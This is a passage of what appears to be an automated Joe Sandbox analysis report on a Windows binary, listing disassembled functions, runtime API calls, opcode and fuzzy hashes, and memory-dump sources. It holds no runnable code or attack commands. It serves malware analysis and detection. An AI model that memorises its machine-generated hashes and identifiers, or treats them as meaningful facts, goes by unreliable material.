                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2227656907-0
                                                                                                                                                                                                                              • Opcode ID: ee5daded1920a45b930385d49f4c9fb7106de6f00b6358014c2482279c1420ad
                                                                                                                                                                                                                              • Instruction ID: aa46445dc62515560b75628329d928c87d25a4fdc03928228d9be78db9822ea6
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ee5daded1920a45b930385d49f4c9fb7106de6f00b6358014c2482279c1420ad
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 59B1B432B1869241FA61EB2195043B9E3A1EB95BE4F849173EA5D07B9DEE3CE441C331
                                                                                                                                                                                                                              Function 00007FF7EAD25E7C Relevance: 6.1, APIs: 4, Instructions: 143timeCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF7EAD25EAA
                                                                                                                                                                                                                                • Part of subcall function 00007FF7EAD255F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7EAD2560C
                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF7EAD25EBB
                                                                                                                                                                                                                                • Part of subcall function 00007FF7EAD25598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7EAD255AC
                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF7EAD25ECC
                                                                                                                                                                                                                                • Part of subcall function 00007FF7EAD255C8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7EAD255DC
                                                                                                                                                                                                                                • Part of subcall function 00007FF7EAD1A948: RtlFreeHeap.NTDLL(?,?,?,00007FF7EAD22D22,?,?,?,00007FF7EAD22D5F,?,?,00000000,00007FF7EAD23225,?,?,?,00007FF7EAD23157), ref: 00007FF7EAD1A95E
                                                                                                                                                                                                                                • Part of subcall function 00007FF7EAD1A948: GetLastError.KERNEL32(?,?,?,00007FF7EAD22D22,?,?,?,00007FF7EAD22D5F,?,?,00000000,00007FF7EAD23225,?,?,?,00007FF7EAD23157), ref: 00007FF7EAD1A968
                                                                                                                                                                                                                              • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF7EAD2610C), ref: 00007FF7EAD25EF3
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3458911817-0
                                                                                                                                                                                                                              • Opcode ID: 6f2171165b001c2744b9d494c76d2a7753c36df5ed5d67f3075860c83c0dbe14
                                                                                                                                                                                                                              • Instruction ID: bf490f140bd8aad831dba4d5576fa1d25809c9971226ccdb52ff4440ccbece9c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6f2171165b001c2744b9d494c76d2a7753c36df5ed5d67f3075860c83c0dbe14
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 72517F32A0864286F710FF25D9816A9E761FB88784FC041B7EA4D876A9EF3CE441C771
                                                                                                                                                                                                                              Function 00007FF7EAD0D010 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2933794660-0
                                                                                                                                                                                                                              • Opcode ID: 884c9866f0db1ea4ea3e8c559fd458021c8c8106c035f87ab540984eb8a2d97e
                                                                                                                                                                                                                              • Instruction ID: d9cd9b7bc61391cace1ad6055a30a35423f7646f5771dd58d4478f56b082e81d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 884c9866f0db1ea4ea3e8c559fd458021c8c8106c035f87ab540984eb8a2d97e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 35111C32B14F058AFB00DB60E8543B973A8FB59758F840E32DA6D467A8DF78D1588351
                                                                                                                                                                                                                              Function 00007FF7EAD23C10 Relevance: 4.8, APIs: 3, Instructions: 340COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: memcpy_s
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1502251526-0
                                                                                                                                                                                                                              • Opcode ID: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
                                                                                                                                                                                                                              • Instruction ID: 87e261a8ba35fed2930a3033ca7a9ec1c11f82c5447e13624001556ee60641c6
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6FC1F372B1868687E724DF19A1447AAF7A1F784B84F848236DB4A43788DB3DE845CB50
                                                                                                                                                                                                                              Function 00007FF7EAD0A474 Relevance: 4.1, Strings: 3, Instructions: 398COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: $header crc mismatch$unknown header flags set
                                                                                                                                                                                                                              • API String ID: 0-1127688429
                                                                                                                                                                                                                              • Opcode ID: fcf6ea83c7a46010d3591867e81b0f53761d3f113121264a3729654d2d1b513f
                                                                                                                                                                                                                              • Instruction ID: 780a92144220847a185cbdf2b75a4dd132b5c1c711110105b7aadce513c59afa
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fcf6ea83c7a46010d3591867e81b0f53761d3f113121264a3729654d2d1b513f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 43F19172A182C54AF7A5EF1480C8BBEBBAAEF44748F85417ADA49473E4CB38D440C751
                                                                                                                                                                                                                              Function 00007FF7EAD29728 Relevance: 3.2, APIs: 2, Instructions: 227COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExceptionRaise_clrfp
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 15204871-0
                                                                                                                                                                                                                              • Opcode ID: a4cc0e8a2f7e024105bf8074fef1866164229a93701b52dcf00f6f20498becf3
                                                                                                                                                                                                                              • Instruction ID: 53904e7ada93a561bbfe86eab91381f1855d761ac3428676c61e10d5e6ae8c25
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a4cc0e8a2f7e024105bf8074fef1866164229a93701b52dcf00f6f20498becf3
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 53B16E73A04B898BEB15CF29C84636CBBA0F744B58F588972DB5D837A8CB39D451C721
                                                                                                                                                                                                                              Function 00007FF7EAD139A4 Relevance: 2.8, Strings: 2, Instructions: 350COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: $
                                                                                                                                                                                                                              • API String ID: 0-227171996
                                                                                                                                                                                                                              • Opcode ID: e57f1980f4491aea9eb328a1e81193c2bccc9a7e68d1918bb9b7207cf9600634
                                                                                                                                                                                                                              • Instruction ID: 3696f2d93929fa46188c6987e7804ac8aa03dd0ba677386b127873c8555e5986
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e57f1980f4491aea9eb328a1e81193c2bccc9a7e68d1918bb9b7207cf9600634
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EBE1B672A0864282FBA8EE35C15023DB3A0FF65B48F944177DA0E07798DF39E952C712
                                                                                                                                                                                                                              Function 00007FF7EAD0A2DB Relevance: 2.7, Strings: 2, Instructions: 216COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: incorrect header check$invalid window size
                                                                                                                                                                                                                              • API String ID: 0-900081337
                                                                                                                                                                                                                              • Opcode ID: 7e7bac63e97a7e962ac1d8bc37368dc0e110af78d4507200a91f80e7c7b94e68
                                                                                                                                                                                                                              • Instruction ID: 6e706e2bade23511861509a906a967b1956bd1ac87c0e7589d60ab1ff3dd8644
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7e7bac63e97a7e962ac1d8bc37368dc0e110af78d4507200a91f80e7c7b94e68
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1E91C772A082C68BF7A4DE14D4D8B7E7BAAFF44348F81417ADA4A467D4CB38E540CB11
                                                                                                                                                                                                                              Function 00007FF7EAD1DEF0 Relevance: 2.6, Strings: 2, Instructions: 144COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: e+000$gfff
                                                                                                                                                                                                                              • API String ID: 0-3030954782
                                                                                                                                                                                                                              • Opcode ID: c8a24eaff8c968987b4d031b15ae93849e98bcf9eddb8930961e84febef9b5bc
                                                                                                                                                                                                                              • Instruction ID: e245cbc019858674186d0360c6bfc66857120ca6ce51eb376c3a2a1a4ba53a43
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c8a24eaff8c968987b4d031b15ae93849e98bcf9eddb8930961e84febef9b5bc
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F6516662B1C2C186F725DE359800769EB91EB64B94F888272CB9C4BAD9CF3DD140C712
                                                                                                                                                                                                                              Function 00007FF7EAD208C8 Relevance: 2.0, APIs: 1, Instructions: 461COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentFeaturePresentProcessProcessor
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1010374628-0
                                                                                                                                                                                                                              • Opcode ID: 537422541fbed36a77ddee3a41e978a3695e14332b64c7d8d0a2d6c09592a1ae
                                                                                                                                                                                                                              • Instruction ID: cdd0afa5b468f91b07516e6c6a2fdce5705423b6c95e49c416963134618f2f9a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 537422541fbed36a77ddee3a41e978a3695e14332b64c7d8d0a2d6c09592a1ae
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EC02B121A1D64B41FA65FB219800379E7A4EF41BA0FC646B7DD5D463DAEE3CA841C332
                                                                                                                                                                                                                              Function 00007FF7EAD1DA5C Relevance: 1.5, Strings: 1, Instructions: 254COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: gfffffff
                                                                                                                                                                                                                              • API String ID: 0-1523873471
                                                                                                                                                                                                                              • Opcode ID: bcab6200947a377332474fa44b4677218d40dcace4b26705986274372b0e4f91
                                                                                                                                                                                                                              • Instruction ID: da7f1efeca77a8275ab10fd1b3443014dfc5de6b70c72353e6d56d395ab6f6d8
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bcab6200947a377332474fa44b4677218d40dcace4b26705986274372b0e4f91
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BBA14662A0878A46FB21DF35A4407A9BB91EF64B84F448072DACD47789DF3DE402C712
                                                                                                                                                                                                                              Function 00007FF7EAD18794 Relevance: 1.4, Strings: 1, Instructions: 177COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID: TMP
                                                                                                                                                                                                                              • API String ID: 3215553584-3125297090
                                                                                                                                                                                                                              • Opcode ID: 09cdd7cf7fc9e7e425d724a32e8c9d3bd5c12dba7606eca5b930980d9b4d1239
                                                                                                                                                                                                                              • Instruction ID: 0df8382ff43cd2b49cbd3379fb6a57b6c22915055fd50abac695394b3d996ae1
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 09cdd7cf7fc9e7e425d724a32e8c9d3bd5c12dba7606eca5b930980d9b4d1239
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 68517111F0864241FA64FA3665113BED3A0EF64BD4FD844F6DD0E4779AEE3CE4518222
                                                                                                                                                                                                                              Function 00007FF7EAD23480 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: HeapProcess
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 54951025-0
                                                                                                                                                                                                                              • Opcode ID: 1f9e0516fd534d967cb731c121838b59470578846d262458ea046ba55ab40ebf
                                                                                                                                                                                                                              • Instruction ID: 081584fd5c9040c0234fdc711a76a8b0c4ea278e15b8e7a97f2faa4b832bfc70
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1f9e0516fd534d967cb731c121838b59470578846d262458ea046ba55ab40ebf
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F2B09220E07B02C2FE08BB256CC231863A8FF58700FD801BAC05C40334DE3C20E59722
                                                                                                                                                                                                                              Function 00007FF7EAD135A0 Relevance: .3, Instructions: 327COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 5eca4e5ff3e7205525bf20f3b63783aa462e3e7adb0228d62bb7e98ab9f5e9bb
                                                                                                                                                                                                                              • Instruction ID: 1bc4950147f317979ec7c6de8d4d0aeeac6e7f572aacd8585e95d11ff51e033b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5eca4e5ff3e7205525bf20f3b63783aa462e3e7adb0228d62bb7e98ab9f5e9bb
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D2D1D666A0864286FBA8EF39804037DB7A0EF65B48F940276CE1D077D9DF39D845C762
                                                                                                                                                                                                                              Function 00007FF7EAD09800 Relevance: .3, Instructions: 287COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
